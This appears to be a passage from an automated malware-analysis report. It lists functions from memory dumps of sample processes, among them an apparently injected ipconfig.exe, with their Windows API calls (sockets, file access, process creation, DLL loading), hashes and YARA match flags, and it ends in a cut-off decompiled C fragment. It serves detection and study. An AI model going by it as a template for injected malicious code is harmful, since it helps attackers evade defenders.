Download Yara Rule

APIs

send.WS2_32 ref: 04E0AF33

Strings

send, xrefs: 04E0AEFA

Memory Dump Source

Source File: 0000000A.00000002.918791521.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: 2edca90fe128c725c60374c8d60f040d9996720a4e45d5006d927af128ba895d
Instruction ID: 8362c928c6c948bc36d4fc0f6dc8033380aa6587b715ab6f122eacba78777763
Opcode Fuzzy Hash: 2edca90fe128c725c60374c8d60f040d9996720a4e45d5006d927af128ba895d
Instruction Fuzzy Hash: 1C011270518A0C8FDB84EF1CD048B2577E1EB58314F1586BE985DCB266C670D881CB81

Uniqueness

Uniqueness Score: -1.00%

Function 04E0ADD2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 04E0AE31

Strings

sock, xrefs: 04E0ADF9

Memory Dump Source

Source File: 0000000A.00000002.918791521.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: a658dfbb0002886f02ed33fbb6ceae53b06ff0d6187248b9ed792d08595e28ac
Instruction ID: d789c1a46c31852ec93857a4790f84e3292d456d50b6bd4ab06f75fbe17b6902
Opcode Fuzzy Hash: a658dfbb0002886f02ed33fbb6ceae53b06ff0d6187248b9ed792d08595e28ac
Instruction Fuzzy Hash: 1A011E706186088FCB84EF1C9048B54BBE0FB59314F1545ADE45DCB266D7B0D9818B86

Uniqueness

Uniqueness Score: -1.00%

Function 04E0ADD0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 04E0AE31

Strings

sock, xrefs: 04E0ADF9

Memory Dump Source

Source File: 0000000A.00000002.918791521.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 10f9494dcd697002e96d8ef7d64bde6d86902f1b0e2736b1f316aa032c1e4241
Instruction ID: e7530a457eb8216f79f4dfdd5328f7ea4c06aae2353e67a5f48816753d0f802b
Opcode Fuzzy Hash: 10f9494dcd697002e96d8ef7d64bde6d86902f1b0e2736b1f316aa032c1e4241
Instruction Fuzzy Hash: D7015E706187088FCB84DF1CD048B54BBE0FB59314F1945ADD45ECB266D7B0C9818B85

Uniqueness

Uniqueness Score: -1.00%

Function 04E0B038, Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 04E0B027

Memory Dump Source

Source File: 0000000A.00000002.918791521.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: b6743f46e3f1f2eb3d075961b8be7146a43deac48baf84514c8a2ef2f0373090
Instruction ID: 4ad9e6606933ab17aababcbb60bc2e12d3be0234be37659ed81cc91ff19a1042
Opcode Fuzzy Hash: b6743f46e3f1f2eb3d075961b8be7146a43deac48baf84514c8a2ef2f0373090
Instruction Fuzzy Hash: 1F2108316186048FEB18DF6CE48467A72D1FB99309F84967EE8ABC72C6DA34E5818245

Uniqueness

Uniqueness Score: -1.00%

Function 04E032C9, Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 04E0331D

Memory Dump Source

Source File: 0000000A.00000002.918791521.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 6bb13f69f888b39ab92230b0e49ad81c518a2e564a985a8a781243bfdaa19091
Instruction ID: b745c7a11a761d31a96c7b0ed85af3e44c8df107d13d4b02073f9113fe86663b
Opcode Fuzzy Hash: 6bb13f69f888b39ab92230b0e49ad81c518a2e564a985a8a781243bfdaa19091
Instruction Fuzzy Hash: 11312D74504B09DFDB64EF6980882A5F7A1FB54308F14967E8D3D8A286CB74A590CFD1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: ipconfig.exe PID: 6744 Parent PID: 3424 ipconfig.exeCOMMON

Executed Functions

Function 009C9D50, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,009C4B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,009C4B77,007A002E,00000000,00000060,00000000,00000000), ref: 009C9D9D

Strings

.z`, xrefs: 009C9D8D, 009C9D98

Memory Dump Source

Source File: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 827ba7b6f181d776d8c93b404ad05a6815f8247578463549e1fa4a86936dd3ad
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 72F0BDB2200208AFCB08CF88DC95EEB77ADAF8C754F158248BA1D97241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 009C9D4A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,009C4B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,009C4B77,007A002E,00000000,00000060,00000000,00000000), ref: 009C9D9D

Strings

.z`, xrefs: 009C9D8D, 009C9D98

Memory Dump Source

Source File: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: c82fdce6f32008ab5f4af533aad81b07def44395f639221d24c8590d170991a9
Instruction ID: 26c8abb7b01a026b9aa1abc2837981788a666d82bdad14ab766613191c97ecdb
Opcode Fuzzy Hash: c82fdce6f32008ab5f4af533aad81b07def44395f639221d24c8590d170991a9
Instruction Fuzzy Hash: AB01AFB2604108AFCB58CF98DC95EEB77A9AF8C354F15824CFA19A7241D634E811CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 009C9E00, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(009C4D32,5EB6522D,FFFFFFFF,009C49F1,?,?,009C4D32,?,009C49F1,FFFFFFFF,5EB6522D,009C4D32,?,00000000), ref: 009C9E45

Memory Dump Source

Source File: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: f7697cdff3da2463cf9b75a86b6a59593de4b8e4a6dd95967caad6e93263b536
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: FEF0B7B2200208AFCB14DF89DC91EEB77ADEF8C754F158248BE1D97241D630E811CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 009C9E80, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(009C4D10,?,?,009C4D10,00000000,FFFFFFFF), ref: 009C9EA5

Memory Dump Source

Source File: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: d6082e9a4e398d14fb8ac4eccbd85fed81e467874ce143716d046bdbd3489d6d
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 29D01776600218ABD710EB98CC86FA77BACEF88760F154599BA5D9B242C530FA0086E1

Uniqueness

Uniqueness Score: -1.00%

Function 03499710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0349971A

Memory Dump Source

Source File: 0000000D.00000002.908995826.0000000003430000.00000040.00000001.sdmp, Offset: 03430000, based on PE: true

Associated: 0000000D.00000002.909153575.000000000354B000.00000040.00000001.sdmp Download File
Associated: 0000000D.00000002.909167522.000000000354F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 006c4ab00e11432b8df73ba0da5c97316400946b90ac360acbc2a9399623ed9f
Instruction ID: 7b699b8140a7d65efd505995446e7f9dcc2d24e073bbbf550a305e124ad3437f
Opcode Fuzzy Hash: 006c4ab00e11432b8df73ba0da5c97316400946b90ac360acbc2a9399623ed9f
Instruction Fuzzy Hash: B990027160144812D100A59D5418646000597F1341F91D012A5014995ECBA588917175

Uniqueness

Uniqueness Score: -1.00%

Function 03499FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03499FEA

Memory Dump Source

Source File: 0000000D.00000002.908995826.0000000003430000.00000040.00000001.sdmp, Offset: 03430000, based on PE: true

Associated: 0000000D.00000002.909153575.000000000354B000.00000040.00000001.sdmp Download File
Associated: 0000000D.00000002.909167522.000000000354F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c58b9ce652ac89c6636672df4b86ef39ab45d159f700e502bcdb58f876729109
Instruction ID: 77d9a826d296f8c1fc9fbd34f2eb08e2b88d2e2ad4c870b6f433c715e901188e
Opcode Fuzzy Hash: c58b9ce652ac89c6636672df4b86ef39ab45d159f700e502bcdb58f876729109
Instruction Fuzzy Hash: 9E90027171158812D110A15D8414706000597E2241F91C412A0814998D8BD588917166

Uniqueness

Uniqueness Score: -1.00%

Function 03499780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0349978A

Memory Dump Source

Source File: 0000000D.00000002.908995826.0000000003430000.00000040.00000001.sdmp, Offset: 03430000, based on PE: true

Associated: 0000000D.00000002.909153575.000000000354B000.00000040.00000001.sdmp Download File
Associated: 0000000D.00000002.909167522.000000000354F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7b8a4ae06aa8071b8b6295e7a6608eb25c334c47df44472e1643e29e7d1e723f
Instruction ID: 2ad9d7e0c176a28a038bcde11e1a8b59d207c003d5f7151fb180b77c5dee8941
Opcode Fuzzy Hash: 7b8a4ae06aa8071b8b6295e7a6608eb25c334c47df44472e1643e29e7d1e723f
Instruction Fuzzy Hash: E690026961344412D180B15D541860A000597E2242FD1D416A0005998CCF5588696365

Uniqueness

Uniqueness Score: -1.00%

Function 03499A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03499A5A

Memory Dump Source

Source File: 0000000D.00000002.908995826.0000000003430000.00000040.00000001.sdmp, Offset: 03430000, based on PE: true

Associated: 0000000D.00000002.909153575.000000000354B000.00000040.00000001.sdmp Download File
Associated: 0000000D.00000002.909167522.000000000354F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 02c6770b18bad39540793b506267d180cb6a78a8297de3c2040204cc682a488a
Instruction ID: c7df4174e4d8a6a78c11b334f6d103a656c154aac23819ecebdd043c90c8a8db
Opcode Fuzzy Hash: 02c6770b18bad39540793b506267d180cb6a78a8297de3c2040204cc682a488a
Instruction Fuzzy Hash: 53900261611C4452D200A56D4C24B07000597E1343F91C116A0144994CCF5588616565

Uniqueness

Uniqueness Score: -1.00%

Function 034996D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 034996DA

Memory Dump Source

Source File: 0000000D.00000002.908995826.0000000003430000.00000040.00000001.sdmp, Offset: 03430000, based on PE: true

Associated: 0000000D.00000002.909153575.000000000354B000.00000040.00000001.sdmp Download File
Associated: 0000000D.00000002.909167522.000000000354F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7e66c58251b450fb635d1e35f10baad4593a3e764af46dc904e5372feeff68b0
Instruction ID: be31432b68a59031d2071cf752f74e8fef8b7f935539e0fbd0486a98953fe544
Opcode Fuzzy Hash: 7e66c58251b450fb635d1e35f10baad4593a3e764af46dc904e5372feeff68b0
Instruction Fuzzy Hash: A690027160144C52D100A15D4414B46000597F1341F91C017A0114A94D8B55C8517565

Uniqueness

Uniqueness Score: -1.00%

Function 034996E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 034996EA

Memory Dump Source

Source File: 0000000D.00000002.908995826.0000000003430000.00000040.00000001.sdmp, Offset: 03430000, based on PE: true

Associated: 0000000D.00000002.909153575.000000000354B000.00000040.00000001.sdmp Download File
Associated: 0000000D.00000002.909167522.000000000354F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 89f622c6d94232c994bb478e0d4a587d20922b57b4d8eae3369346e3b3727c37
Instruction ID: 2352a44e80fe2120dca5e9846471bd7433152423a5a53846cefbb317edfddf5d
Opcode Fuzzy Hash: 89f622c6d94232c994bb478e0d4a587d20922b57b4d8eae3369346e3b3727c37
Instruction Fuzzy Hash: 589002716014CC12D110A15D841474A000597E1341F95C412A4414A98D8BD588917165

Uniqueness

Uniqueness Score: -1.00%

Function 03499540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0349954A

Memory Dump Source

Source File: 0000000D.00000002.908995826.0000000003430000.00000040.00000001.sdmp, Offset: 03430000, based on PE: true

Associated: 0000000D.00000002.909153575.000000000354B000.00000040.00000001.sdmp Download File
Associated: 0000000D.00000002.909167522.000000000354F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1f63e5ce26a91f588359c2fe4a10c0231cd31672524a9d8bdee1f3291b78518a
Instruction ID: db94bdf80bfdc9fe120cefbfe3e2865babfc4068d3143603692deb1fb53502c5
Opcode Fuzzy Hash: 1f63e5ce26a91f588359c2fe4a10c0231cd31672524a9d8bdee1f3291b78518a
Instruction Fuzzy Hash: F6900265611444130105E55D0714507004697E6391391C022F1005990CDB6188616165

Uniqueness

Uniqueness Score: -1.00%

Function 03499910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0349991A

Memory Dump Source

Source File: 0000000D.00000002.908995826.0000000003430000.00000040.00000001.sdmp, Offset: 03430000, based on PE: true

Associated: 0000000D.00000002.909153575.000000000354B000.00000040.00000001.sdmp Download File
Associated: 0000000D.00000002.909167522.000000000354F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 38d28dbe623bbc0a34baf48208e8b4501791b2f9666c4279b026cb731e44c18f
Instruction ID: 8fa2aa753f9919bbfc8b5557dfe7923cb26f41bbfa106f9fce6974578b3ee943
Opcode Fuzzy Hash: 38d28dbe623bbc0a34baf48208e8b4501791b2f9666c4279b026cb731e44c18f
Instruction Fuzzy Hash: 1A9002B160144812D140B15D4414746000597E1341F91C012A5054994E8B998DD576A9

Uniqueness

Uniqueness Score: -1.00%

Function 034995D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 034995DA

Memory Dump Source

Source File: 0000000D.00000002.908995826.0000000003430000.00000040.00000001.sdmp, Offset: 03430000, based on PE: true

Associated: 0000000D.00000002.909153575.000000000354B000.00000040.00000001.sdmp Download File
Associated: 0000000D.00000002.909167522.000000000354F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d4f81923026dd5c67f71ab0397d2058ded032778f3c2637086d35257badd8f78
Instruction ID: 1f7b898c9c6a1c1287629e2c80f50a04a21983e8a23e14ccb158de60fa2db126
Opcode Fuzzy Hash: d4f81923026dd5c67f71ab0397d2058ded032778f3c2637086d35257badd8f78
Instruction Fuzzy Hash: 999002A1602444134105B15D4424616400A97F1241B91C022E10049D0DCB6588917169

Uniqueness

Uniqueness Score: -1.00%

Function 034999A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 034999AA

Memory Dump Source

Source File: 0000000D.00000002.908995826.0000000003430000.00000040.00000001.sdmp, Offset: 03430000, based on PE: true

Associated: 0000000D.00000002.909153575.000000000354B000.00000040.00000001.sdmp Download File
Associated: 0000000D.00000002.909167522.000000000354F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e1337f29284b7bea6b168ece543ce452cd19c76140481b799819e9e72507683f
Instruction ID: eacd73ec76efa2a3f494e6205dc8b1b729d926e0a70214de05d0239dca1d2733
Opcode Fuzzy Hash: e1337f29284b7bea6b168ece543ce452cd19c76140481b799819e9e72507683f
Instruction Fuzzy Hash: 249002A174144852D100A15D4424B060005D7F2341F91C016E1054994D8B59CC52716A

Uniqueness

Uniqueness Score: -1.00%

Function 03499840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0349984A

Memory Dump Source

Source File: 0000000D.00000002.908995826.0000000003430000.00000040.00000001.sdmp, Offset: 03430000, based on PE: true

Associated: 0000000D.00000002.909153575.000000000354B000.00000040.00000001.sdmp Download File
Associated: 0000000D.00000002.909167522.000000000354F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d124f3a0ff680edfe42a964bd20c625747b776769ede841b83ce14acf1cb931d
Instruction ID: 30ee7bd16d871c8df668e785a2a22292ba7e5fe52f05ebbd4f402fef99fc3534
Opcode Fuzzy Hash: d124f3a0ff680edfe42a964bd20c625747b776769ede841b83ce14acf1cb931d
Instruction Fuzzy Hash: F0900261642485625545F15D44145074006A7F12817D1C013A1404D90C8B669856E665

Uniqueness

Uniqueness Score: -1.00%

Function 03499860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0349986A

Memory Dump Source

Source File: 0000000D.00000002.908995826.0000000003430000.00000040.00000001.sdmp, Offset: 03430000, based on PE: true

Associated: 0000000D.00000002.909153575.000000000354B000.00000040.00000001.sdmp Download File
Associated: 0000000D.00000002.909167522.000000000354F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: be6b3afd35a9431e2d5f27a493b383895978ba35f2cacfe17119cb4c4b2041cb
Instruction ID: df8e9322c414dee7106d7eddaf58d7275e2e43f36629bab0738be488ad14871e
Opcode Fuzzy Hash: be6b3afd35a9431e2d5f27a493b383895978ba35f2cacfe17119cb4c4b2041cb
Instruction Fuzzy Hash: 0C90027160144823D111A15D4514707000997E1281FD1C413A0414998D9B968952B165

Uniqueness

Uniqueness Score: -1.00%

Function 009CA060, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,009B3AF8), ref: 009CA08D

Strings

.z`, xrefs: 009CA07C, 009CA088

Memory Dump Source

Source File: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 4d5ed6de82cc76d158ef7a077fac6086cba904f3dfc75653cbed11b8eff739a2
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 05E01AB12002086BD714DF59CC45EA777ACAF88750F014558B91957241C630E9108AB1

Uniqueness

Uniqueness Score: -1.00%

Function 009B82E8, Relevance: 3.1, APIs: 2, Instructions: 60threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 009B834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 009B836B

Memory Dump Source

Source File: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 6e8ef45432a7fb4c3eabae0f1b8a9ba80d696b32a35589c10930cd6486ad30dc
Instruction ID: 4a94cdd015324d18413b010c75342e01df036ad634d3a0b675cc5f905bbaf460
Opcode Fuzzy Hash: 6e8ef45432a7fb4c3eabae0f1b8a9ba80d696b32a35589c10930cd6486ad30dc
Instruction Fuzzy Hash: 0801D871A802287BE721A6949D43FFF776CAF40B50F144019FF04BA1C1E695690547E6

Uniqueness

Uniqueness Score: -1.00%

Function 009B82F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 009B834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 009B836B

Memory Dump Source

Source File: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 82079f10d3c2bb338251c77b1746ba6aed9656e107e48eb6c4cfa7d71c1448a4
Instruction ID: 98500a9fff3194cc5dab5c37d87f85502146f553238c311a9c80c920fcc68dbe
Opcode Fuzzy Hash: 82079f10d3c2bb338251c77b1746ba6aed9656e107e48eb6c4cfa7d71c1448a4
Instruction Fuzzy Hash: 1401A771A802287BE720A6949D03FFF776C6B40F50F054118FF04BA1C2E694690646F6

Uniqueness

Uniqueness Score: -1.00%

Function 009BACC0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 009BAD32

Memory Dump Source

Source File: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction ID: 443db0b64a96f6a448e458310854f0cdebb651d7655735296f48df36943db071
Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction Fuzzy Hash: A0015EB5D0020DABDB10EAA4DD42FDDB7B8AB54308F004199E90C97281F631EB09CB92

Uniqueness

Uniqueness Score: -1.00%

Function 009CA0D0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 009CA124

Memory Dump Source

Source File: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 20d633cbc85003b9d5f2b41b5fa5546066982cd76758cb0237b2e4e00a7f6cf4
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: FD01B2B2210108BFCB54DF89DC81EEB77ADAF8C754F158258FA0D97241C630E851CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 009CA1BB, Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,009BF192,009BF192,?,00000000,?,?), ref: 009CA1F0

Memory Dump Source

Source File: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: b2821809fa2c5d66faad49328bb3ff18fdca544870be30a10612ddd9248e6576
Instruction ID: d1192c93fcaf5d30b88857c4ac25e0f7d4644abf9c011aa5f93374397efadfe1
Opcode Fuzzy Hash: b2821809fa2c5d66faad49328bb3ff18fdca544870be30a10612ddd9248e6576
Instruction Fuzzy Hash: 7BE092B5600104AFD710DF54DC85FD73B689F85250F018154F95D97241C931A8108BB1

Uniqueness

Uniqueness Score: -1.00%

Function 009CA1C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,009BF192,009BF192,?,00000000,?,?), ref: 009CA1F0

Memory Dump Source

Source File: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 67801e2d02bd7dbd7907e60339b23c4266cd16c0f7d3939af6fe087f5d69c330
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: D2E01AB16002086BDB10DF49CC85FE737ADAF88650F018154BA0D57241C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 009BF690, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,009B8CF4,?), ref: 009BF6BB

Memory Dump Source

Source File: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction ID: de2c7e4be9a3c215293cf7dc613d89b4c5e653919fec63cf41069f41753e0ae8
Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction Fuzzy Hash: C0D05E727903082AE610AAA49C13F66328C6B44B10F490064F9489B2C3D950E4004165

Uniqueness

Uniqueness Score: -1.00%

Function 009BF689, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,009B8CF4,?), ref: 009BF6BB

Memory Dump Source

Source File: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 82f8581727302ac61be21ed5808eede34c8186d4f24077b8416d5690627f8205
Instruction ID: d572be579c08b5bd8f1803e86cc0036ff70f2798983891b2c4d5f9da14879498
Opcode Fuzzy Hash: 82f8581727302ac61be21ed5808eede34c8186d4f24077b8416d5690627f8205
Instruction Fuzzy Hash: 56D05E7AB902053BE620ABB49E27F6A72896B84754F0940A8FD4CEB3C7D920D5104525

Uniqueness

Uniqueness Score: -1.00%

Function 0349967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03499694

Memory Dump Source

Source File: 0000000D.00000002.908995826.0000000003430000.00000040.00000001.sdmp, Offset: 03430000, based on PE: true

Associated: 0000000D.00000002.909153575.000000000354B000.00000040.00000001.sdmp Download File
Associated: 0000000D.00000002.909167522.000000000354F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1dc96617569baf95d8f3e812a7f3a9d9c9d7614ec5e8ee36396f171d0fa73065
Instruction ID: 7e767de9b5f054bc1f0c700b9e4503465e054352deece3a9261710ea3d6b3114
Opcode Fuzzy Hash: 1dc96617569baf95d8f3e812a7f3a9d9c9d7614ec5e8ee36396f171d0fa73065
Instruction Fuzzy Hash: 2BB09B71D014C5D5EA11D76546087177D0477D1741F56C057D1020A91A4778C491F5B9

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 034EFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E034EFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
